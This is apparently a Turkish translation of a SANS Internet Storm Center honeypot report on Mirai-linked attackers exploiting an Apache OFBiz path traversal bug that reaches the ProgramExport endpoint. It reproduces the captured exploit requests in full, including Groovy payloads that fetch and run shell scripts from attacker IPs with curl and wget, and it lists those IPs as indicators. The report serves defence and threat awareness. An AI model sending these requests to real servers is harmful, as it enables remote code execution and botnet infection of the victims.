Kurumsal Kaynak Planlama (ERP) Yazılımı, birçok girişimcinin insan kaynakları, muhasebe, nakliye ve üretim desteğinin merkezinde yer alır. Bu sistemler çok karmaşık ve bakımı zor hale gelebilir. Genellikle son derece özelleştirilmiştir ve bu da yama yapmayı zorlaştırabilir. Ancak, kritik güvenlik açıkları bu sistemleri etkilemeye devam eder ve kritik iş verilerini riske atar.
SANS İnternet Fırtına Merkezi, açık kaynaklı ERP çerçevesi OFBiz’in şu anda Mirai botnetinin yeni türlerinin hedefi olduğunu gösteren bir rapor yayınladı.
Apache Foundation, kapsamlı proje portföyünün bir parçası olarak, ERP (Kurumsal Kaynak Planlama) uygulamaları oluşturmak için Java tabanlı bir çerçeve olan OFBiz’i destekler. OFBiz, ticari alternatiflere göre çok daha az yaygın görünmektedir. Ancak, diğer tüm ERP sistemlerinde olduğu gibi, kuruluşlar hassas iş verileri için ona güvenir ve bu ERP sistemlerinin güvenliği kritik öneme sahiptir.
Bu yılın mayıs ayında OFBiz için kritik bir güvenlik güncellemesi yayınlandı. Güncelleme, uzaktan komut yürütülmesine yol açabilecek bir dizin geçiş güvenlik açığını düzeltti. 18.12.13’ten önceki OFBiz sürümleri etkilendi. Birkaç hafta sonra, güvenlik açığıyla ilgili ayrıntılar kamuoyuna açıklandı.
Dizin geçişi veya yol geçişi güvenlik açıkları, erişim kontrol kurallarını atlatmak için kullanılabilir. Örneğin, bir kullanıcı bir “/public” dizinine erişebiliyorsa ancak bir “/admin” dizinine erişemiyorsa, bir saldırgan erişim kontrol mantığını kandırmak için “/public/../admin” gibi bir URL kullanabilir. Son zamanlarda, CISA ve FBI, dizin geçişine odaklanan “Tasarımla Güvenli” girişiminin bir parçası olarak bir uyarı yayınladı. CISA, şu anda “Bilinen İstismar Edilen Güvenlik Açıkları” (KEV) kataloğunun bir parçası olarak 55 dizin geçişi güvenlik açığını takip ettiklerini belirtti.
OFBiz için dizin geçişi noktalı virgül ekleyerek kolayca tetiklenir. Bir saldırganın tek yapması gereken erişebileceği bir URL bulmak ve noktalı virgülün ardından kısıtlanmış bir URL eklemektir. Şu anda gördüğümüz istismar URL’si şudur:
/webtools/control/forgotPassword;/ProgramExport
Kullanıcıların önce oturum açmadan parolaları sıfırlayabilmeleri gerektiğinden, “forgotPassword” herhangi bir kimlik doğrulaması gerektirmez. Öte yandan, “ProgramExport” erişim kontrollü olmalı ve kullanıcı oturum açmadığı sürece erişilemeyebilir. “ProgramExport” özellikle keyfi kod yürütülmesine izin vermesi açısından tehlikelidir. OFBiz’deki hatalı mantık, URL’yi noktalı virgülde değerlendirmeyi durdurdu. Bu, herhangi bir kullanıcının oturum açmadan URL’nin ikinci kısmı olan “/ProgramExport”a erişmesine izin verdi.
Bir saldırganın güvenlik açığından faydalanmak için bir POST isteği kullanması gerekir ancak mutlaka bir istek gövdesine ihtiyacı yoktur. Bunun yerine bir URL parametresi gayet iyi çalışacaktır.
SANS Internet Storm Center, geniş bir web uygulaması güvenlik açığı yelpazesini istismar etme girişimlerini tespit etmek için kapsamlı bir honeypot ağı kullanır. Önemli yeni istismar girişimleri “İlk Görüldü” raporunda özetlenmiştir. Bu hafta sonu, bu sensörler yukarıda bahsedilen OFBiz dizin geçişi güvenlik açığı olan CVE-2024-32213’ü istismar etme girişimlerinde önemli bir artış tespit etti ve bu “İlk Görüldü” raporu tarafından hemen tespit edildi.
Saldırı girişimleri, günümüzdeki “Mirai” botnet çeşitleriyle ilişkilendirilen IoT cihazlarını istismar etmeye yönelik çeşitli girişimlerle ilişkilendirilen iki farklı IP adresinden kaynaklandı.
Kötü niyetli kişiler exploit’in iki çeşidini kullandı. İlki, exploit’in yürütmeyi amaçladığı komutu eklemek için URL’yi kullandı:
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
İkincisi ise, daha çok “POST” istekleri için kullanılan, komut isteğinin gövdesini kullanıyordu:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
Ne yazık ki, ne “bin.sh” ne de “sh” betiği kurtarılamadı. IP adresleri, infosec blog yazarı Brian Krebs’e bir şapka çıkartmak için “KrebsOnSecurity” kullanıcı aracısını kullanarak 29 Temmuz’da taramalara dahil edildi. Ancak, taranan URL’ler çoğunlukla parazitikti ve önceki saldırılardan kalan mevcut web kabuklarını arıyordu. IP adresi ayrıca “botx.arm” adlı bir dosyayı dağıtmak için de kullanıldı. Bu dosya adı genellikle Mirai varyantlarıyla ilişkilendirilir.
Mayıs ayındaki güvenlik açığı duyurusuyla birlikte, OFBiz güvenlik açığından faydalanmak için bazı taramalar bekliyorduk. İstismar önemsizdi ve güvenlik açığı olan ve açığa çıkan nüfus küçük olsa da, bu geçmişte saldırganları durdurmadı. Ancak şimdi en azından deneme yapıyorlar ve belki de güvenlik açığını Mirai varyantları gibi botlara ekliyorlar.
Sadece birkaç IP söz konusu:
- 95.214.27.196: Exploit’i URL parametresi olarak gönderiyor ve kötü amaçlı yazılım barındırıyor.
- 83.222.191.62: İstek gövdesi olarak exploit gönderiliyor. 185.196.10.231’de barındırılan kötü amaçlı yazılım. Temmuz ayının başlarında, bu IP IoT güvenlik açıkları için tarama yaptı.
- 185.196.10.231: kötü amaçlı yazılım barındırma
Bu makaleyi ilginç bulduysanız ve Web Uygulamalarını, API’leri ve Mikro Hizmetleri Güvence Altına Alma dünyasına daha fazla dalmak istiyorsanız, 4-9 Eylül tarihleri arasında gerçekleşecek olan Network Security 2024’te SEC522 kursum için bana katılabilirsiniz. Etkinlikte neler olduğunu buradan görebilirsiniz.